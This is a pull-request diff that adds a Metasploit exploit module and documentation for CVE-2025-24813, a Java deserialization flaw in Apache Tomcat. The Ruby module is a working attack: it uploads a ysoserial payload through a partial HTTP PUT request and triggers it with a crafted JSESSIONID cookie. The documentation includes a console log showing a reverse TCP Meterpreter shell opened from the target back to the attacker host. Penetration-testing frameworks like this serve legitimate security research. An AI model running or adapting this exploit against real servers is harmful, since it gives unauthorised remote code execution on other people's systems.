Merge pull request rapid7#19995 from chutton-r7/cve-2025-24813

Module for CVE-2025-24813

Author: jheysel-r7

documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md

@@ -0,0 +1,150 @@
+## Vulnerable Application
+This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality
+that can be exploited with a partial HTTP PUT request to place an attacker controlled deserialization payload in the
+<tomcat_root_dir>/webapps/ROOT/ directory. For the exploit to succeed, writes must be enabled for the default servlet,
+and `org.apache.catalina.session.PersistentManager` must be configured to use `org.apache.catalina.session.FileStore`.
+
+## Setup
+Download Ubuntu Server 24:
+`wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso`
+
+Install ubuntu on your preferred hypervisor, enable SSH during installation. Reboot once installation is complete and SSH into the target.
+Download Tomcat and Java:
+```
+wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
+wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
+```
+
+Extract the JDK Archive to the appropriate directory:
+```
+tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
+sudo mkdir -p /opt/java
+sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8
+```
+
+Install `unzip` and extract Tomcat:
+```
+sudo apt install unzip -y
+sudo unzip apache-tomcat-9.0.90.zip -d /opt/
+```
+
+Set `CATALINA_HOME` and `JAVA_HOME` also update `PATH` by adding the following to `~/.bashrc`:
+```
+export CATALINA_HOME=/opt/apache-tomcat-9.0.90
+export JAVA_HOME=/opt/java/zulu8
+export PATH=$JAVA_HOME/bin:$PATH
+```
+
+Apply changes:
+```
+source ~/.bashrc
+```
+
+Change Tomcat permissions:
+```
+sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
+sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin
+```
+
+Edit `conf/web.xml` and update the default servlet with the following:
+```
+    <servlet>
+        <servlet-name>default</servlet-name>
+        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
+        <init-param>
+            <param-name>debug</param-name>
+            <param-value>0</param-value>
+        </init-param>
+        <init-param>
+            <param-name>listings</param-name>
+            <param-value>false</param-value>
+        </init-param>
+        <init-param>
+          <param-name>readonly</param-name>
+          <param-value>false</param-value>
+        </init-param>
+        <load-on-startup>1</load-on-startup>
+    </servlet>
+```
+
+Edit `conf/content.xml` and add the following inside the pre-existing `<Context>` tags:
+```
+    <Manager className="org.apache.catalina.session.PersistentManager">
+      <Store className="org.apache.catalina.session.FileStore" />
+    </Manager>
+```
+
+Create the following directory inside the tomcat root directory:
+```
+mkdir -p webapps/ROOT/WEB-INF/lib
+cd ./webapps/ROOT/WEB-INF/lib
+```
+
+Download the following dependencies:
+```
+wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
+wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
+wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar
+```
+
+Start the vulnerable Tomcat instance:
+```
+cd /opt/apache-tomcat-9.0.90/bin
+./startup.sh
+```
+
+## Options
+
+### GADGET
+The desired ysoserial gadget to use to obtain RCE.
+
+## Verification Steps
+1. Start msfconsole
+2. `use multi/http/tomcat_partial_put_deserialization`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set RPORT <TARGET_PORT>`
+5. `set GADGET <YSOSERIAL_GADGET>`
+6. `set LHOST eth0`
+7. `check`
+8. `exploit`
+
+## Scenarios
+
+### Apache Tomcat 9.0.90, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command
+
+```
+msf6 > use multi/http/tomcat_partial_put_deserialization
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
+gadget => CommonsCollections6
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
+[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
+[+] 172.16.199.130:8080 - The target is vulnerable.
+msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Utilizing CommonsCollections6 deserialization chain
+[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
+[*] Attempting to deserialize session file..
+[+] 500 error response usually indicates success :)
+[*] Sending stage (24772 bytes) to 172.16.199.130
+[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
+[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
+[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700
+
+meterpreter > getuid
+Server username: msfuser
+meterpreter > sysinfo
+Computer        : msfserver
+OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter >
+```

modules/exploits/multi/http/tomcat_partial_put_deserialization.rb

@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::JavaDeserialization
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Tomcat Partial PUT Java Deserialization',
+        'Description' => %q{
+          This module exploits a Java deserialization vulnerability in Apache
+          Tomcat's session restoration functionality that can be exploited with a partial HTTP PUT request to
+          place an attacker controlled deserialization payload in the <tomcat_root_dir>/webapps/ROOT/ directory.
+
+          For the exploit to succeed, writes must be enabled for the default servlet,
+          and org.apache.catalina.session.PersistentManager must be configured to use
+          org.apache.catalina.session.FileStore.
+
+          Verified working on 10.1.16-1
+        },
+        'Author' => [
+          'sw0rd1ight', # Discovery
+          'Calum Hutton', # MSF Module
+          'h4ck3r-04' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2025-24813'],
+          ['URL', 'https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24813'],
+        ],
+        'DisclosureDate' => '2025-03-10', # Vendor release note
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('GADGET', [true, 'ysoserial gadget', 'CommonsBeanutils1']),
+    ])
+  end
+
+  def check
+    # Advanced check, runs the full exploit (without a command)
+    # Assumes a 500 response from requesting the session indicates success
+    begin
+      upload_session_id = upload_payload('')
+      unless upload_session_id
+        return Exploit::CheckCode::Safe
+      end
+    rescue Msf::Exploit::Failed => e
+      return CheckCode::Safe(e)
+    end
+
+    trigger_res = trigger_payload(upload_session_id)
+    if trigger_res&.code != 500
+      Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("Utilizing #{datastore['GADGET']} deserialization chain")
+
+    upload_session_id = upload_payload(cmd)
+    unless upload_session_id
+      fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
+    end
+
+    print_good("Uploaded ysoserial payload (#{upload_session_id}.session) via partial PUT")
+    print_status('Attempting to deserialize session file..')
+
+    trigger_payload_res = trigger_payload(upload_session_id)
+    unless trigger_payload_res&.code == 500
+      fail_with(Failure::UnexpectedReply, "Failed to deserialize session: #{trigger_payload_res.code}")
+    end
+
+    print_good('500 error response usually indicates success :)')
+  end
+
+  def upload_payload(cmd)
+    # Generate a random session id
+    session_id = Rex::Text.rand_text_alpha(10)
+    # Determine the shell and register the payload for cleanup
+    case target['Platform']
+    when ['unix', 'linux']
+      shell = 'bash'
+      register_file_for_cleanup("../webapps/ROOT/#{session_id}.session")
+    when 'win'
+      shell = 'cmd'
+      register_file_for_cleanup("..\\webapps\\ROOT\\#{session_id}.session}")
+    else
+      fail_with(Failure::NoTarget, "Unsupported target platform! (#{target['Platform']})")
+    end
+
+    res = send_partial_put(
+      generate_java_deserialization_for_command(datastore['GADGET'].to_s, shell, cmd),
+      "#{session_id}.session"
+    )
+
+    # 201/204 is the normal success code
+    # 409 indicates a conflict or file permission issue
+    # but the partial file will still be created
+    if [201, 204, 409].include?(res&.code)
+      session_id
+    end
+  end
+
+  def trigger_payload(session_id)
+    # Request the session id to retrieve the file and trigger deserialization
+    request = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => { 'Cookie' => "JSESSIONID=.#{session_id}" }
+    }
+    send_request_cgi(request)
+  end
+
+  def send_partial_put(data, name)
+    request = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, name),
+      'headers' => { 'Content-Range' => 'bytes 0-5/100' },
+      'data' => data
+    }
+    send_request_cgi(request)
+  end
+
+end